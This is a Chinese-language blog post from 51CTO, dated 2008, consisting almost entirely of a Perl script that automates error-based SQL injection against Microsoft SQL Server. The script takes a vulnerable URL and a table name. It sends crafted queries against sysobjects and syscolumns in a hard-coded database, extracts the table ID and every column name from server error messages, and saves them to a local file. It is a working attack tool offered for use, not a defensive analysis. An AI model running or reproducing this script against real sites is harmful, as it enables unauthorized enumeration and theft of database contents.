perl在mssql注入中爆表列
版权声明:原创作品,允许转载,转载时请务必以超链接形式标明文章 原始出处 、作者信息和本声明。否则将追究法律责任。http://n3tl04d.blog.51cto.com/89255/71369 |
#!/usr/bin/perl -w #Codz By N3tl04D #Date 2008-4-13 use strict; use LWP; if(@ARGV != 2){ print "用法:$0 注入点 表名"; exit; } my $browser; my $start=time(); my $talbe=$ARGV[1]; my $vul=$ARGV[0]; sub do_GET { $browser = LWP::UserAgent->new unless $browser; my $resp = $browser->get(@_); return ($resp->content, $resp->status_line, $resp->is_success, $resp) if wantarray; return unless $resp->is_success; return $resp->content; } my $tabl="$vul%20and%200<>(select%20count(*)%20from%20congaltan.dbo.sysobjects%20where%20xtype='u'%20and%20name='".$talbe."'%20and%20uid>(str(id)))"; my ($content, $status, $is_success) = do_GET($tabl); if ($content =~ m{value \'(.+?)\'}gi) { print "得到表ID:$1\n"; open(FILE,">>e:/perl/count.txt") || die ("Could not open file"); print FILE "===============================================================\n表名:$talbe ID:$1\n"; close(FILE); crake($1); } else { print "不能爆表\n"; last; } sub crake { my @arr1=(); for (my $j=1;$j<=470;$j++) { print "猜解第$j个表列\n"; my @arr=join("','",@arr1); my $url="$vul%20and%200<>(select%20top%201%20name%20from%20congaltan.dbo.syscolumns%20where%20id=$_[0]%20and%20name%20not%20in('@arr'))"; my ($content, $status, $is_success) = do_GET($url); if ($content =~ m{value \'(.+?)\'}gi) { print "得到表列:$1\n"; push(@arr1,$1); save($1); } else { print "猜解完成\n"; last; } } } my $end=time(); my $time=$end-$start; print "用时".$time."秒\n"; sub save { open(FILE1,">>e:/perl/count.txt") || die ("Could not open file"); print FILE1 "-$_[0]\n"; close(FILE1); } 本文出自 “n3tl04d's Blog-技术成就梦想” 博客,请务必保留此出处http://n3tl04d.blog.51cto.com/89255/71369 本文出自 51CTO.COM技术博客 |
n3tl04d
博客统计信息
热门文章
最新评论
友情链接